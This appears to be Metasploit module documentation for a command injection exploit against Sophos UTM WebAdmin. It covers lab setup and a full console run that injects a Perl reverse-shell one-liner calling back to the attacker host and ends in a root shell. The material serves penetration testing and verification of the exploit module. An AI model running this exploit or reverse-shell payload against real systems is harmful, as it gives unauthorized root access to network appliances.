## Vulnerable Application

### Setup

Follow the [setup guide] from Sophos, in particular the [system requirements] and [installation instructions]. You can stop after that.

1. Boot the ISO
1. Follow the on-screen prompts
1. Reboot
1. Hax

Tested against [`asg-9.510-5.1.iso`](#scenarios) (unpatched) and `asg-9.511-2.1.iso` (patched).

[setup guide]: https://docs.sophos.com/nsg/sophos-utm/utm/9.707/help/en-us/Content/utm/utmAdminGuide/Installation.htm
[system requirements]: https://docs.sophos.com/nsg/sophos-utm/utm/9.707/help/en-us/Content/utm/utmAdminGuide/InstallationSystemRequirements.htm
[installation instructions]: https://docs.sophos.com/nsg/sophos-utm/utm/9.707/help/en-us/Content/utm/utmAdminGuide/InstallationInstructions.htm

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

## Scenarios

### Sophos UTM 9.510

```
msf6 > use exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection
[*] Using configured payload cmd/unix/reverse_perl_ssl
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > options

Module options (exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      4444             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl_ssl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set rhosts 172.16.57.254
rhosts => 172.16.57.254
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set lhost 172.16.57.1
lhost => 172.16.57.1
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set verbose true
verbose => true
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > run

[+] perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"172.16.57.1:443",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
[-] Handler failed to bind to 172.16.57.1:443
[*] Started reverse SSL handler on 0.0.0.0:443
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Injecting command: sleep 5
[*] Elapsed time: 5.107014999957755 seconds
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing cmd/unix/reverse_perl_ssl (Unix Command)
[*] Injecting command: perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"172.16.57.1:443",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
[*] Command shell session 1 opened (172.16.57.1:443 -> 172.16.57.254:43275 ) at 2021-10-21 12:23:57 -0500

whoami
root
```
